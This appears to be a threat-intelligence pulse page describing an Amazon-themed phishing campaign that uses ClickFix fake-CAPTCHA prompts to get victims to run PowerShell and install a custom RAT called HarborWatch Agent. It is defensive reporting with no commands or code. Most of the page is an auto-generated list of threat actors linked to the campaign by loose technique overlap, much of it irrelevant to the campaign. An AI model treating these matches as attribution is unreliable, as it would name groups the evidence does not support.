Trusted Design

From Fake Amazon Security Alert to HarborWatch Agent: ClickFix Delivery of a Custom Monitoring RAT

概要

A sophisticated phishing campaign exploits Amazon's brand reputation through spoofed security alerts to deliver HarborWatch Agent, a custom remote access trojan. The attack chain begins with emails impersonating Amazon security notifications about suspicious account activity, directing victims to lookalike domains. Users are presented with fake CAPTCHA verification pages that employ ClickFix social engineering techniques, instructing them to execute PowerShell commands on their own systems. The multi-stage infection downloads mysql.exe from compromised infrastructure, which communicates with a Chinese-language command and control panel branded Harbor Sentinel. The RAT collects extensive system information including OS details, architecture, CPU count, disk usage, memory status, and network configurations, exfiltrating data through API endpoints to the threat actor's monitoring infrastructure.

Created: 2026-06-10

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

APT28

Score: 21.42
Matched TTPs:
  • T1222.002 - Linux and Mac Permissions
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1574.009 - Path Interception by Unquoted Path
  • T1585 - Establish Accounts
MITREへのリンク →

APT29

Score: 32.53
Matched TTPs:
  • T1222.002 - Linux and Mac Permissions
  • T1099 - Timestomp
  • T1584.008 - Network Devices
  • T1202 - Indirect Command Execution
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1568 - Dynamic Resolution
  • T1556.008 - Network Provider DLL
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Scattered Spider

Score: 28.86
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1609 - Container Administration Command
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1556.008 - Network Provider DLL
  • T1597 - Search Closed Sources
MITREへのリンク →

FIN4

Score: 4.13
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
MITREへのリンク →

Andariel

Score: 5.58
Matched TTPs:
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Magic Hound

Score: 32.11
Matched TTPs:
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1010 - Application Window Discovery
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1601.001 - Patch System Image
MITREへのリンク →

HAFNIUM

Score: 9.83
Matched TTPs:
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1099 - Timestomp
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
MITREへのリンク →

Turla

Score: 24.45
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1099 - Timestomp
  • T1063 - Security Software Discovery
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
MITREへのリンク →

APT32

Score: 23.66
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

Saint Bear

Score: 3.77
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1597 - Search Closed Sources
MITREへのリンク →

FIN6

Score: 9.26
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

Sidewinder

Score: 8.59
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1601.001 - Patch System Image
MITREへのリンク →

MuddyWater

Score: 20.03
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.002 - Backup Software Discovery
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
MITREへのリンク →

Earth Lusca

Score: 16.50
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Winter Vivern

Score: 12.37
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
MITREへのリンク →

Silence

Score: 8.98
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.011 - Plist Modification
  • T1562.001 - Disable or Modify Tools
  • T1601.001 - Patch System Image
MITREへのリンク →

Contagious Interview

Score: 22.36
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
MITREへのリンク →

LazyScripter

Score: 5.35
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1601.001 - Patch System Image
MITREへのリンク →

TA505

Score: 14.62
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

FIN7

Score: 10.68
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1562.001 - Disable or Modify Tools
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image
MITREへのリンク →

Cobalt Group

Score: 18.18
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
  • T1027.014 - Polymorphic Code
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image
MITREへのリンク →

Higaisa

Score: 8.25
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1665 - Hide Infrastructure
MITREへのリンク →

Kimsuky

Score: 37.67
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1213.006 - Databases
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1546.008 - Accessibility Features
  • T1609 - Container Administration Command
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure
MITREへのリンク →

Indrik Spider

Score: 6.06
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1183 - Image File Execution Options Injection
  • T1597 - Search Closed Sources
MITREへのリンク →

Leafminer

Score: 8.37
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1101 - Security Support Provider
  • T1601.001 - Patch System Image
MITREへのリンク →

Mustang Panda

Score: 25.52
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1169 - Sudo
  • T1136.003 - Cloud Account
  • T1055.005 - Thread Local Storage
MITREへのリンク →

Star Blizzard

Score: 12.15
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
  • T1609 - Container Administration Command
MITREへのリンク →

HEXANE

Score: 14.55
Matched TTPs:
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1601.001 - Patch System Image
MITREへのリンク →

Gamaredon Group

Score: 27.69
Matched TTPs:
  • T1099 - Timestomp
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1601.001 - Patch System Image
  • T1086 - PowerShell
MITREへのリンク →

TA2541

Score: 6.06
Matched TTPs:
  • T1099 - Timestomp
  • T1098.007 - Additional Local or Domain Groups
  • T1597 - Search Closed Sources
MITREへのリンク →

Lotus Blossom

Score: 5.95
Matched TTPs:
  • T1099 - Timestomp
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

FIN13

Score: 17.37
Matched TTPs:
  • T1099 - Timestomp
  • T1584.008 - Network Devices
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1134.001 - Token Impersonation/Theft
MITREへのリンク →

Volt Typhoon

Score: 33.05
Matched TTPs:
  • T1099 - Timestomp
  • T1686.003 - Windows Host Firewall
  • T1556.002 - Password Filter DLL
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1488 - Disk Content Wipe
  • T1584.002 - DNS Server
  • T1665 - Hide Infrastructure
MITREへのリンク →

FIN8

Score: 4.61
Matched TTPs:
  • T1099 - Timestomp
  • T1601.001 - Patch System Image
MITREへのリンク →

Mustard Tempest

Score: 4.54
Matched TTPs:
  • T1682 - Query Public AI Services
MITREへのリンク →

Daggerfly

Score: 9.37
Matched TTPs:
  • T1584.008 - Network Devices
  • T1530 - Data from Cloud Storage
  • T1573 - Encrypted Channel
MITREへのリンク →

GALLIUM

Score: 12.28
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
MITREへのリンク →

Dragonfly

Score: 16.75
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1531 - Account Access Removal
  • T1573 - Encrypted Channel
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Ke3chang

Score: 15.59
Matched TTPs:
  • T1584.008 - Network Devices
  • T1590.006 - Network Security Appliances
  • T1198 - SIP and Trust Provider Hijacking
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
MITREへのリンク →

Agrius

Score: 8.13
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
MITREへのリンク →

APT41

Score: 15.45
Matched TTPs:
  • T1584.008 - Network Devices
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1055.004 - Asynchronous Procedure Call
  • T1573 - Encrypted Channel
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

APT5

Score: 6.09
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

menuPass

Score: 13.91
Matched TTPs:
  • T1584.008 - Network Devices
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Threat Group-3390

Score: 19.58
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1010 - Application Window Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1573 - Encrypted Channel
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Wizard Spider

Score: 15.60
Matched TTPs:
  • T1584.008 - Network Devices
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

Ember Bear

Score: 8.55
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

Storm-0501

Score: 15.26
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1686.003 - Windows Host Firewall
  • T1027.014 - Polymorphic Code
  • T1158 - Hidden Files and Directories
MITREへのリンク →

Sandworm Team

Score: 35.53
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1686.003 - Windows Host Firewall
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1546.008 - Accessibility Features
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image
MITREへのリンク →

Sea Turtle

Score: 6.90
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
MITREへのリンク →

Leviathan

Score: 22.40
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
MITREへのリンク →

PROMETHIUM

Score: 3.84
Matched TTPs:
  • T1530 - Data from Cloud Storage
MITREへのリンク →

Patchwork

Score: 8.54
Matched TTPs:
  • T1530 - Data from Cloud Storage
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure
MITREへのリンク →

UNC3886

Score: 12.12
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1597 - Search Closed Sources
  • T1488 - Disk Content Wipe
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Akira

Score: 10.47
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1597 - Search Closed Sources
  • T1601 - Modify System Image
MITREへのリンク →

Storm-1811

Score: 6.06
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1486 - Data Encrypted for Impact
MITREへのリンク →

APT42

Score: 5.27
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
MITREへのリンク →

APT1

Score: 7.01
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

ZIRCONIUM

Score: 7.30
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
MITREへのリンク →

RedEcho

Score: 3.92
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

OilRig

Score: 6.49
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Lazarus Group

Score: 31.56
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1055.005 - Thread Local Storage
  • T1665 - Hide Infrastructure
  • T1086 - PowerShell
MITREへのリンク →

EXOTIC LILY

Score: 3.80
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
MITREへのリンク →

Silent Librarian

Score: 11.09
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1546.008 - Accessibility Features
  • T1609 - Container Administration Command
MITREへのリンク →

APT38

Score: 15.89
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1055.004 - Asynchronous Procedure Call
  • T1590 - Gather Victim Network Information
  • T1597 - Search Closed Sources
  • T1493 - Transmitted Data Manipulation
MITREへのリンク →

Moonstone Sleet

Score: 8.20
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1573 - Encrypted Channel
MITREへのリンク →

TeamTNT

Score: 13.20
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1665 - Hide Infrastructure
MITREへのリンク →

CURIUM

Score: 11.16
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
MITREへのリンク →

RedCurl

Score: 9.25
Matched TTPs:
  • T1016.002 - Wi-Fi Discovery
  • T1090 - Proxy
  • T1027.004 - Compile After Delivery
MITREへのリンク →

LAPSUS$

Score: 14.35
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1609 - Container Administration Command
  • T1556.008 - Network Provider DLL
  • T1601 - Modify System Image
MITREへのリンク →

SilverTerrier

Score: 3.29
Matched TTPs:
  • T1131 - Authentication Package
MITREへのリンク →

BackdoorDiplomacy

Score: 3.50
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

Deep Panda

Score: 7.80
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1027.014 - Polymorphic Code
MITREへのリンク →

APT39

Score: 8.83
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Tropic Trooper

Score: 15.22
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1055.004 - Asynchronous Procedure Call
  • T1136.003 - Cloud Account
  • T1665 - Hide Infrastructure
MITREへのリンク →

Moses Staff

Score: 3.24
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
MITREへのリンク →

Fox Kitten

Score: 6.91
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1601.001 - Patch System Image
MITREへのリンク →

Tonto Team

Score: 6.85
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1027.004 - Compile After Delivery
MITREへのリンク →

BlackByte

Score: 11.14
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
MITREへのリンク →

Medusa Group

Score: 9.18
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1183 - Image File Execution Options Injection
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

APT3

Score: 11.21
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
MITREへのリンク →

Salt Typhoon

Score: 3.84
Matched TTPs:
  • T1110.003 - Password Spraying
MITREへのリンク →

Play

Score: 8.57
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1597 - Search Closed Sources
  • T1574.009 - Path Interception by Unquoted Path
  • T1601.001 - Patch System Image
MITREへのリンク →

admin@338

Score: 3.20
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
MITREへのリンク →

APT19

Score: 6.08
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

SideCopy

Score: 5.60
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1584.002 - DNS Server
MITREへのリンク →

Stealth Falcon

Score: 3.44
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
MITREへのリンク →

Chimera

Score: 9.87
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.004 - Asynchronous Procedure Call
  • T1087.004 - Cloud Account
  • T1601.001 - Patch System Image
  • T1665 - Hide Infrastructure
MITREへのリンク →

Axiom

Score: 3.29
Matched TTPs:
  • T1177 - LSASS Driver
MITREへのリンク →

INC Ransom

Score: 7.15
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
MITREへのリンク →

Velvet Ant

Score: 5.93
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

ToddyCat

Score: 4.57
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1665 - Hide Infrastructure
MITREへのリンク →

APT12

Score: 4.54
Matched TTPs:
  • T1055.002 - Portable Executable Injection
MITREへのリンク →

LuminousMoth

Score: 5.41
Matched TTPs:
  • T1087.004 - Cloud Account
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Confucius

Score: 4.81
Matched TTPs:
  • T1087.004 - Cloud Account
  • T1665 - Hide Infrastructure
MITREへのリンク →

BRONZE BUTLER

Score: 4.14
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Aquatic Panda

Score: 3.66
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1601.001 - Patch System Image
MITREへのリンク →

Rocke

Score: 6.54
Matched TTPs:
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027.004 - Compile After Delivery
MITREへのリンク →

WIRTE

Score: 5.14
Matched TTPs:
  • T1562.001 - Disable or Modify Tools
  • T1027.014 - Polymorphic Code
MITREへのリンク →

DarkVishnya

Score: 6.94
Matched TTPs:
  • T1562.001 - Disable or Modify Tools
  • T1213.003 - Code Repositories
MITREへのリンク →

DarkHydrus

Score: 4.13
Matched TTPs:
  • T1531 - Account Access Removal
MITREへのリンク →

TA551

Score: 4.61
Matched TTPs:
  • T1027.014 - Polymorphic Code
  • T1601.001 - Patch System Image
MITREへのリンク →

GOLD SOUTHFIELD

Score: 4.79
Matched TTPs:
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1183 - Image File Execution Options Injection
  • T1555.003 - Credentials from Web Browsers
  • T1027.014 - Polymorphic Code
  • T1027.004 - Compile After Delivery
  • T1087.004 - Cloud Account
  • T1546.008 - Accessibility Features
  • T1597 - Search Closed Sources
  • T1213.006 - Databases
  • T1131 - Authentication Package
  • T1609 - Container Administration Command
  • T1665 - Hide Infrastructure
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1601.001 - Patch System Image
MITREへのリンク →

Sandworm Team

Score: 0.66
Matched TTPs:
  • T1573 - Encrypted Channel
  • T1055.004 - Asynchronous Procedure Call
  • T1183 - Image File Execution Options Injection
  • T1555.003 - Credentials from Web Browsers
  • T1484.002 - Trust Modification
  • T1562.001 - Disable or Modify Tools
  • T1686.003 - Windows Host Firewall
  • T1087.004 - Cloud Account
  • T1546.008 - Accessibility Features
  • T1016.002 - Wi-Fi Discovery
  • T1063 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups
  • T1601.001 - Patch System Image
MITREへのリンク →

Volt Typhoon

Score: 0.61
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1555.003 - Credentials from Web Browsers
  • T1099 - Timestomp
  • T1686.003 - Windows Host Firewall
  • T1083 - File and Directory Discovery
  • T1488 - Disk Content Wipe
  • T1547.005 - Security Support Provider
  • T1584.002 - DNS Server
  • T1665 - Hide Infrastructure
  • T1055.004 - Asynchronous Procedure Call
  • T1590.006 - Network Security Appliances
MITREへのリンク →

APT29

Score: 0.60
Matched TTPs:
  • T1584.008 - Network Devices
  • T1555.003 - Credentials from Web Browsers
  • T1027.004 - Compile After Delivery
  • T1099 - Timestomp
  • T1177 - LSASS Driver
  • T1568 - Dynamic Resolution
  • T1222.002 - Linux and Mac Permissions
  • T1547.011 - Plist Modification
  • T1556.008 - Network Provider DLL
  • T1202 - Indirect Command Execution
MITREへのリンク →

Magic Hound

Score: 0.60
Matched TTPs:
  • T1055.004 - Asynchronous Procedure Call
  • T1183 - Image File Execution Options Injection
  • T1555.003 - Credentials from Web Browsers
  • T1562.001 - Disable or Modify Tools
  • T1099 - Timestomp
  • T1597 - Search Closed Sources
  • T1010 - Application Window Discovery
  • T1547.005 - Security Support Provider
  • T1016.002 - Wi-Fi Discovery
  • T1601.001 - Patch System Image
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
MITREへのリンク →

Lazarus Group

Score: 0.59
Matched TTPs:
  • T1055.005 - Thread Local Storage
  • T1183 - Image File Execution Options Injection
  • T1562.001 - Disable or Modify Tools
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1086 - PowerShell
  • T1547.011 - Plist Modification
  • T1665 - Hide Infrastructure
  • T1069.001 - Local Groups
  • T1055.004 - Asynchronous Procedure Call
  • T1590.006 - Network Security Appliances
  • T1098.007 - Additional Local or Domain Groups
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る